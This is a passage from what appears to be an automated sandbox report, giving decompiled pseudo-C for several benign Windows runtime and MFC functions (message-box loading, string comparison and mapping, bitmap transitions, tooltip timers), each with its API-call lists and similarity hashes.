C-Code - Quality: 46%

			E0040AC99(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t4;
				intOrPtr* _t7;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t15;
				void* _t17;

				_t14 = 0;
				_t17 =  *0x439fd0 - _t14; // 0x0
				if(_t17 != 0) {
					L4:
					_t4 =  *0x439fd4; // 0x0
					if(_t4 != 0) {
						_t14 =  *_t4();
						if(_t14 != 0) {
							_t7 =  *0x439fd8; // 0x0
							if(_t7 != 0) {
								_t14 =  *_t7(_t14);
							}
						}
					}
					return  *0x439fd0(_t14, _a4, _a8, _a12);
				}
				_t15 = LoadLibraryA("user32.dll");
				if(_t15 == 0) {
					L10:
					return 0;
				}
				_t11 = GetProcAddress(_t15, "MessageBoxA");
				 *0x439fd0 = _t11;
				if(_t11 == 0) {
					goto L10;
				} else {
					 *0x439fd4 = GetProcAddress(_t15, "GetActiveWindow");
					 *0x439fd8 = GetProcAddress(_t15, "GetLastActivePopup");
					goto L4;
				}
			}

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00409A35,?,Microsoft Visual C++ Runtime Library,00012010,?,0042F53C,?,0042F58C,?,?,?,Runtime Error!Program: ), ref: 0040ACAB
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040ACC3
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0040ACD4
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040ACE1

Strings

GetLastActivePopup, xrefs: 0040ACD6
GetActiveWindow, xrefs: 0040ACCE
MessageBoxA, xrefs: 0040ACBD
user32.dll, xrefs: 0040ACA6

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: 1c5d333bfefa196ee41cc629c286ab9d53157f6c4e3a187cce04e0c17d5edf39
Instruction ID: a9e059596031861d50e68843925f1eff39380896684ae965336398d5bbd15c8e
Opcode Fuzzy Hash: 1c5d333bfefa196ee41cc629c286ab9d53157f6c4e3a187cce04e0c17d5edf39
Instruction Fuzzy Hash: 42017131300311AFC7109FB4AC84A2B7BE9EE88791758103BE500E22F5DBB89C15DB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004160E6, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E004160E6(signed short _a4, signed int _a8) {
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t7;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				CHAR* _t16;
				signed short _t17;

				_t16 = "COMCTL32.DLL";
				_t14 = GetModuleHandleA(_t16);
				_t6 = LoadLibraryA(_t16);
				_t13 = _t6;
				if(_t13 == 0) {
					return _t6;
				} else {
					_t17 = 0;
					_t7 = GetProcAddress(_t13, "InitCommonControlsEx");
					if(_t7 != 0) {
						_push(_a4);
						if( *_t7() != 0) {
							_t17 = _a4;
							if(_t14 == 0) {
								__imp__#17();
								_t17 = _t17 | 0x00003fc0;
							}
						}
					} else {
						if((_a8 & 0x00003fc0) == _a8) {
							__imp__#17();
							_t17 = 0x3fc0;
						}
					}
					FreeLibrary(_t13);
					return _t17;
				}
			}

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,004163E0,00000000,00020000,?,?,00000000), ref: 004160EF
LoadLibraryA.KERNEL32(COMCTL32.DLL,?,00000000,?,?,?,?,?,?,?,?,00411E7A,00000010,00000000), ref: 004160F8
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0041610C
#17.COMCTL32(?,00000000,?,?,?,?,?,?,?,?,00411E7A,00000010,00000000), ref: 00416127
#17.COMCTL32(?,00000000,?,?,?,?,?,?,?,?,00411E7A,00000010,00000000), ref: 00416143
FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,00411E7A,00000010,00000000), ref: 0041614F

Strings

InitCommonControlsEx, xrefs: 00416104
COMCTL32.DLL, xrefs: 004160E8, 004160EE, 004160F5

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Library$AddressFreeHandleLoadModuleProc
String ID: COMCTL32.DLL$InitCommonControlsEx
API String ID: 1437655972-4218389149
Opcode ID: e643cccf137e1cae2860d0c7a901f21b2a575cf028b437239449ca769040a35c
Instruction ID: 81bca5f6391c8e8793c086ec2d57317fbfa520992b7089d48771000b14303d3d
Opcode Fuzzy Hash: e643cccf137e1cae2860d0c7a901f21b2a575cf028b437239449ca769040a35c
Instruction Fuzzy Hash: B6F0A436704322A783229F64ED4896F73A9EF947627460436F841E3211DF28DC4687AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD71, Relevance: 13.7, APIs: 9, Instructions: 221
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040BD71(int _a4, int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				int _v36;
				short* _v40;
				short* _v44;
				char _v58;
				struct _cpinfo _v64;
				void* _v80;
				int _t65;
				int _t66;
				int _t69;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t86;
				int _t87;
				int _t88;
				void* _t96;
				char _t99;
				char _t101;
				intOrPtr _t104;
				intOrPtr _t105;
				int _t107;
				short* _t109;
				int _t111;
				int _t114;
				intOrPtr _t115;
				short* _t116;
				int _t118;

				_push(0xffffffff);
				_push(0x42f6e8);
				_push(E00409800);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t115;
				_t116 = _t115 - 0x30;
				_v28 = _t116;
				_t118 =  *0x43a068; // 0x0
				_t107 = 1;
				if(_t118 != 0) {
					L5:
					_t111 = _a16;
					if(_t111 > 0) {
						_t88 = E0040BFEE(_a12, _t111);
						_pop(_t96);
						_t111 = _t88;
						_a16 = _t111;
					}
					if(_a24 > 0) {
						_t87 = E0040BFEE(_a20, _a24);
						_pop(_t96);
						_a24 = _t87;
					}
					_t65 =  *0x43a068; // 0x0
					if(_t65 != 2) {
						if(_t65 != _t107) {
							goto L48;
						} else {
							if(_a28 == 0) {
								_t86 =  *0x439efc; // 0x0
								_a28 = _t86;
							}
							if(_t111 == 0 || _a24 == 0) {
								if(_t111 != _a24) {
									if(_a24 <= _t107) {
										if(_t111 > _t107) {
											L30:
											_push(3);
											goto L18;
										} else {
											if(GetCPInfo(_a28,  &_v64) == 0) {
												goto L48;
											} else {
												if(_t111 <= 0) {
													if(_a24 <= 0) {
														goto L39;
													} else {
														if(_v64 >= 2) {
															_t82 =  &_v58;
															if(_v58 != 0) {
																while(1) {
																	_t104 =  *((intOrPtr*)(_t82 + 1));
																	if(_t104 == 0) {
																		goto L20;
																	}
																	_t99 =  *_a20;
																	if(_t99 <  *_t82 || _t99 > _t104) {
																		_t82 = _t82 + 2;
																		if( *_t82 != 0) {
																			continue;
																		} else {
																			goto L20;
																		}
																	} else {
																		goto L17;
																	}
																	goto L49;
																}
															}
														}
														goto L20;
													}
												} else {
													if(_v64 >= 2) {
														_t84 =  &_v58;
														if(_v58 != 0) {
															while(1) {
																_t105 =  *((intOrPtr*)(_t84 + 1));
																if(_t105 == 0) {
																	goto L30;
																}
																_t101 =  *_a12;
																if(_t101 <  *_t84 || _t101 > _t105) {
																	_t84 = _t84 + 2;
																	if( *_t84 != 0) {
																		continue;
																	} else {
																		goto L30;
																	}
																} else {
																	goto L17;
																}
																goto L50;
															}
														}
													}
													goto L30;
													L50:
												}
											}
										}
									} else {
										L20:
										_t66 = _t107;
									}
								} else {
									L17:
									_push(2);
									L18:
									_pop(_t66);
								}
							} else {
								L39:
								_t69 = MultiByteToWideChar(_a28, 9, _a12, _t111, 0, 0);
								_v32 = _t69;
								if(_t69 == 0) {
									goto L48;
								} else {
									_v8 = 0;
									E00406830(_t69 + _t69 + 0x00000003 & 0x000000fc, _t96);
									_v28 = _t116;
									_v40 = _t116;
									_v8 = _v8 | 0xffffffff;
									if(_v40 == 0 || MultiByteToWideChar(_a28, _t107, _a12, _t111, _v40, _v32) == 0) {
										goto L48;
									} else {
										_t114 = MultiByteToWideChar(_a28, 9, _a20, _a24, 0, 0);
										_v36 = _t114;
										if(_t114 == 0) {
											goto L48;
										} else {
											_v8 = _t107;
											E00406830(_t114 + _t114 + 0x00000003 & 0x000000fc, _t96);
											_v28 = _t116;
											_t109 = _t116;
											_v44 = _t109;
											_v8 = _v8 | 0xffffffff;
											if(_t109 == 0 || MultiByteToWideChar(_a28, 1, _a20, _a24, _t109, _t114) == 0) {
												goto L48;
											} else {
												_t66 = CompareStringW(_a4, _a8, _v40, _v32, _t109, _t114);
											}
										}
									}
								}
							}
						}
					} else {
						_t66 = CompareStringA(_a4, _a8, _a12, _t111, _a20, _a24);
					}
				} else {
					if(CompareStringW(0, 0, 0x42f5cc, _t107, 0x42f5cc, _t107) == 0) {
						if(CompareStringA(0, 0, 0x42f5c8, _t107, 0x42f5c8, _t107) == 0) {
							L48:
							_t66 = 0;
						} else {
							 *0x43a068 = 2;
							goto L5;
						}
					} else {
						 *0x43a068 = _t107;
						goto L5;
					}
				}
				L49:
				 *[fs:0x0] = _v20;
				return _t66;
				goto L50;
			}

APIs

CompareStringW.KERNEL32(00000000,00000000,0042F5CC,00000001,0042F5CC,00000001,00000000,02070E6C,00408FB5,0000000C,?,00000000,-0000076C,0000000B,0000000B), ref: 0040BDAF
CompareStringA.KERNEL32(00000000,00000000,0042F5C8,00000001,0042F5C8,00000001,?,0040A577), ref: 0040BDCC
CompareStringA.KERNEL32(?,?,00000000,0040A577,?,0000000B,00000000,02070E6C,00408FB5,0000000C,?,00000000,-0000076C,0000000B,0000000B), ref: 0040BE2A
GetCPInfo.KERNEL32(0000000B,00000000,00000000,02070E6C,00408FB5,0000000C,?,00000000,-0000076C,0000000B,0000000B,?,0040A577), ref: 0040BE7B
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,0000000B,00000000,00000000,?,0040A577), ref: 0040BEFA
MultiByteToWideChar.KERNEL32(?,00000001,00000000,0000000B,?,?,?,0040A577), ref: 0040BF5B
MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,00000000,?,0040A577), ref: 0040BF6E
MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,?,00000000,?,0040A577), ref: 0040BFBA
CompareStringW.KERNEL32(?,?,00000000,00000000,?,00000000,?,00000000,?,0040A577), ref: 0040BFD2

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: ByteCharCompareMultiStringWide$Info
String ID:
API String ID: 1651298574-0
Opcode ID: 299655132c169d1a6a538a860ebc1a291665f2f6c94a1d5cf859f72052921b9d
Instruction ID: 15593673328f6da1faa78daf279323c0e4ae83b25398234663969b267ace6320
Opcode Fuzzy Hash: 299655132c169d1a6a538a860ebc1a291665f2f6c94a1d5cf859f72052921b9d
Instruction Fuzzy Hash: 3971783290024AAFDF219F54DC859EB7BBAEB05344F14413BFA51B22A0D7398851DBED

Uniqueness

Uniqueness Score: -1.00%

Function 00409DEA, Relevance: 13.7, APIs: 9, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00409DEA(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, signed int _a32) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				short* _v40;
				int _v44;
				void* _v60;
				int _t61;
				int _t62;
				int _t82;
				int _t83;
				int _t88;
				short* _t89;
				int _t90;
				void* _t91;
				int _t99;
				intOrPtr _t101;
				short* _t102;
				int _t104;

				_push(0xffffffff);
				_push(0x42f5d0);
				_push(E00409800);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				_t102 = _t101 - 0x1c;
				_v28 = _t102;
				_t104 =  *0x439ee0; // 0x1
				if(_t104 != 0) {
					L5:
					if(_a16 > 0) {
						_t83 = E0040BFEE(_a12, _a16);
						_pop(_t91);
						_a16 = _t83;
					}
					_t61 =  *0x439ee0; // 0x1
					if(_t61 != 2) {
						if(_t61 != 1) {
							goto L21;
						} else {
							if(_a28 == 0) {
								_t82 =  *0x439efc; // 0x0
								_a28 = _t82;
							}
							asm("sbb eax, eax");
							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12, _a16, 0, 0);
							_v32 = _t88;
							if(_t88 == 0) {
								goto L21;
							} else {
								_v8 = 0;
								E00406830(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
								_v28 = _t102;
								_v40 = _t102;
								_v8 = _v8 | 0xffffffff;
								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
									goto L21;
								} else {
									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
									_v44 = _t99;
									if(_t99 == 0) {
										goto L21;
									} else {
										if((_a9 & 0x00000004) == 0) {
											_v8 = 1;
											E00406830(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
											_v28 = _t102;
											_t89 = _t102;
											_v36 = _t89;
											_v8 = _v8 | 0xffffffff;
											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
												goto L21;
											} else {
												_push(0);
												_push(0);
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
												if(_t99 == 0) {
													goto L21;
												} else {
													goto L30;
												}
											}
										} else {
											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
												L30:
												_t62 = _t99;
											} else {
												goto L21;
											}
										}
									}
								}
							}
						}
					} else {
						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t90 = 1;
					if(LCMapStringW(0, 0x100, 0x42f5cc, _t90, ??, ??) == 0) {
						if(LCMapStringA(0, 0x100, 0x42f5c8, _t90, 0, 0) == 0) {
							L21:
							_t62 = 0;
						} else {
							 *0x439ee0 = 2;
							goto L5;
						}
					} else {
						 *0x439ee0 = _t90;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t62;
			}

APIs

LCMapStringW.KERNEL32(00000000,00000100,0042F5CC,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409E2C
LCMapStringA.KERNEL32(00000000,00000100,0042F5C8,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409E48
LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409E91
MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409EC9
MultiByteToWideChar.KERNEL32(00000000,00000001,00000020,00000001,00000100,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409F21
LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409F37
LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409F6A
LCMapStringW.KERNEL32(?,00000100,00000100,00000100,?,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409FD2

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID:
API String ID: 352835431-0
Opcode ID: 6b965e39d78a5d0b96a2fafe8855910c976ca46044e99100e6440c906be38713
Instruction ID: 2f12d8ec06d9f8176a5bc05fe246616eea55ae1664675450d96905dac16d2820
Opcode Fuzzy Hash: 6b965e39d78a5d0b96a2fafe8855910c976ca46044e99100e6440c906be38713
Instruction Fuzzy Hash: EA515D3190020ABBCF218F54CC49EEF7BB5FB45794F10412AF915A22E1D3399D61DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404577, Relevance: 13.6, APIs: 9, Instructions: 135
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00404577(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, signed int _a28, int _a32, intOrPtr _a36, signed int _a40) {
				struct HDC__* _v8;
				int _v12;
				struct HBITMAP__* _v16;
				void* _t135;

				_v8 = CreateCompatibleDC(_a16);
				_v16 = CreateCompatibleBitmap(_a16, _a28, _a32);
				SelectObject(_v8, _v16);
				BitBlt(_v8, 0, 0, _a28, _a32, _a16, _a20, _a24, 0xcc0020);
				_v12 = 0;
				while(1) {
					asm("cdq");
					if(_v12 >= _a28 / _a40 + 1) {
						break;
					}
					StretchBlt(_v8, _a28 - (_v12 + 1) * _a40, 0, (_v12 + 1) * _a40, _a32, _a4, _a8, _a12, _a28, _a32, 0xcc0020);
					BitBlt(_a16, _a20 + _a28 - (_v12 + 1) * _a40, _a24, (_v12 + 1) * _a40, _a32, _v8, _a28 - (_v12 + 1) * _a40, 0, 0xcc0020);
					E0040381D(_a36);
					_t135 = _t135 + 4;
					_v12 = _v12 + 1;
				}
				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
				DeleteObject(_v16);
				DeleteDC(_v8);
				return 1;
			}

APIs

CreateCompatibleDC.GDI32(?), ref: 00404581
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00404596
SelectObject.GDI32(?,?), ref: 004045A7
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 004045CE
StretchBlt.GDI32(?,?,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00404637
BitBlt.GDI32(00000000,?,?,?,?,?,?,00000000,00CC0020), ref: 00404682
BitBlt.GDI32(00CC0020,?,?,00000000,?,00000000,?,?,00CC0020), ref: 004046BE
DeleteObject.GDI32(?), ref: 004046C8
DeleteDC.GDI32(?), ref: 004046D2

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: CompatibleCreateDeleteObject$BitmapSelectStretch
String ID:
API String ID: 1300799366-0
Opcode ID: 5cd169734f3d4076a8351419a8053b8a42ab7ab7df8d0770ac810dba87890358
Instruction ID: a75907197356ce4ca66e83fb1b854f5ba4b4597ff605ca05275262f1e745a3b8
Opcode Fuzzy Hash: 5cd169734f3d4076a8351419a8053b8a42ab7ab7df8d0770ac810dba87890358
Instruction Fuzzy Hash: 7F51A5B6600109AFCB04CF98DD95EEE77B9FF8C348F118258FA09A7254D634E9118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00404816, Relevance: 13.6, APIs: 9, Instructions: 135
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00404816(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, int _a28, signed int _a32, intOrPtr _a36, signed int _a40) {
				struct HDC__* _v8;
				int _v12;
				struct HBITMAP__* _v16;
				void* _t135;

				_v8 = CreateCompatibleDC(_a16);
				_v16 = CreateCompatibleBitmap(_a16, _a28, _a32);
				SelectObject(_v8, _v16);
				BitBlt(_v8, 0, 0, _a28, _a32, _a16, _a20, _a24, 0xcc0020);
				_v12 = 0;
				while(1) {
					asm("cdq");
					if(_v12 >= _a32 / _a40 + 1) {
						break;
					}
					StretchBlt(_v8, 0, _a32 - (_v12 + 1) * _a40, _a28, (_v12 + 1) * _a40, _a4, _a8, _a12, _a28, _a32, 0xcc0020);
					BitBlt(_a16, _a20, _a24 + _a32 - (_v12 + 1) * _a40, _a28, (_v12 + 1) * _a40, _v8, 0, _a32 - (_v12 + 1) * _a40, 0xcc0020);
					E0040381D(_a36);
					_t135 = _t135 + 4;
					_v12 = _v12 + 1;
				}
				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
				DeleteObject(_v16);
				DeleteDC(_v8);
				return 1;
			}

APIs

CreateCompatibleDC.GDI32(?), ref: 00404820
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00404835
SelectObject.GDI32(?,?), ref: 00404846
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0040486D
StretchBlt.GDI32(?,00000000,?,?,?,00000000,?,?,?,?,00CC0020), ref: 004048D6
BitBlt.GDI32(?,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00404921
BitBlt.GDI32(00CC0020,?,?,00000000,?,00000000,?,?,00CC0020), ref: 0040495D
DeleteObject.GDI32(?), ref: 00404967
DeleteDC.GDI32(?), ref: 00404971

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: CompatibleCreateDeleteObject$BitmapSelectStretch
String ID:
API String ID: 1300799366-0
Opcode ID: cb5311c6d517274d3363f8e51808646c66a29d66cd1ded68f5bbd400a57f7aa2
Instruction ID: 1794ec46a4d52dcc5cb24ae7db09ad2764e7e5e2d0b87eeeb5bcffab36add2c1
Opcode Fuzzy Hash: cb5311c6d517274d3363f8e51808646c66a29d66cd1ded68f5bbd400a57f7aa2
Instruction Fuzzy Hash: 375198B6600109AFCB04CF98D995EEE77B9FF8C344F158258FA09A7254C635ED11CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041E758, Relevance: 13.6, APIs: 9, Instructions: 127
timekeyboardCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0041E758(intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				void* __ebp;
				signed int _t49;
				struct HWND__* _t60;
				intOrPtr _t63;
				intOrPtr _t66;
				void* _t68;
				void* _t72;
				intOrPtr _t81;
				void* _t82;
				intOrPtr _t83;
				struct HWND__* _t85;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t88;

				_t87 = __ecx;
				_t42 = GetKeyState(1);
				if(_t42 < 0) {
					L31:
					return _t42;
				}
				_t83 = E004249C4();
				_v12 = _t83;
				GetCursorPos( &_v20);
				ScreenToClient( *(_t87 + 0x1c),  &_v20);
				_t49 =  *((intOrPtr*)( *_t87 + 0x64))(_v20.x, _v20.y, 0, _t82);
				_v8 = _t49;
				if(_t49 < 0) {
					 *(_t83 + 0x104) =  *(_t83 + 0x104) | 0xffffffff;
					L16:
					if(_v8 < 0) {
						L25:
						if( *(_v12 + 0x104) == 0xffffffff) {
							KillTimer( *(_t87 + 0x1c), 0xe001);
						}
						 *((intOrPtr*)( *_t87 + 0xdc))(0xffffffff);
						L28:
						_t42 = 0xe000;
						if(_a4 != 0xe000) {
							goto L31;
						}
						_t42 = KillTimer( *(_t87 + 0x1c), 0xe000);
						if(_v8 < 0) {
							goto L31;
						}
						return  *((intOrPtr*)( *_t87 + 0xdc))(_v8);
					}
					ClientToScreen( *(_t87 + 0x1c),  &_v20);
					_push(_v20.y);
					_t85 = WindowFromPoint(_v20);
					if(_t85 == 0) {
						L23:
						_t59 = _v12;
						_v8 = _v8 | 0xffffffff;
						 *(_t59 + 0x104) =  *(_v12 + 0x104) | 0xffffffff;
						L24:
						if(_v8 >= 0) {
							goto L28;
						}
						goto L25;
					}
					_t60 =  *(_t87 + 0x1c);
					if(_t85 == _t60 || IsChild(_t60, _t85) != 0) {
						goto L24;
					} else {
						_t63 =  *((intOrPtr*)(_v12 + 0xcc));
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 + 0x1c));
						}
						if(_t63 == _t85) {
							goto L24;
						} else {
							goto L23;
						}
					}
				}
				_t72 = E00414CEF(_t87);
				if(E00414D5B(_t87) == 0 || E004166B3(_t72) == 0) {
					_v8 = _v8 | 0xffffffff;
				}
				_t66 =  *((intOrPtr*)(_t83 + 0xcc));
				if(_t66 != 0) {
					_t86 =  *((intOrPtr*)(_t66 + 0x1c));
				} else {
					_t86 = 0;
				}
				_t68 = E00413740(_t88, GetCapture());
				if(_t68 != _t87) {
					if(_t68 != 0) {
						_t81 =  *((intOrPtr*)(_t68 + 0x1c));
					} else {
						_t81 = 0;
					}
					if(_t81 != _t86 && E00414CEF(_t68) == _t72) {
						_v8 = _v8 | 0xffffffff;
					}
				}
				goto L16;
			}

APIs

GetKeyState.USER32(00000001), ref: 0041E764
GetCursorPos.USER32(?), ref: 0041E782
ScreenToClient.USER32 ref: 0041E78F
GetCapture.USER32 ref: 0041E7DF

Part of subcall function 004166B3: IsWindowEnabled.USER32(?), ref: 004166BD

ClientToScreen.USER32(?,?), ref: 0041E829
WindowFromPoint.USER32(?,?), ref: 0041E835
IsChild.USER32(?,00000000), ref: 0041E84A
KillTimer.USER32(?,0000E001), ref: 0041E890
KillTimer.USER32(?,0000E000), ref: 0041E8AD

Part of subcall function 00414D5B: GetForegroundWindow.USER32(00000000,?,0041E7BB), ref: 00414D5F
Part of subcall function 00414D5B: GetLastActivePopup.USER32(?), ref: 00414D77

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Window$ClientKillScreenTimer$ActiveCaptureChildCursorEnabledForegroundFromLastPointPopupState
String ID:
API String ID: 1383385731-0
Opcode ID: 44edb78afc276ab783549d9561dc10d3387f8a1e8d9759539a985f87b51eceed
Instruction ID: 60a7b001f52f4571865f2cd2d5ebedbd3e454d14a8c641626661d3e0f237eb6f
Opcode Fuzzy Hash: 44edb78afc276ab783549d9561dc10d3387f8a1e8d9759539a985f87b51eceed
Instruction Fuzzy Hash: 4D416334B00605DFDB20AF66CC44AEE7BB5EF44714F20866AE861D72E1D738DD819B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040443F, Relevance: 13.6, APIs: 9, Instructions: 120
windowCOMMON

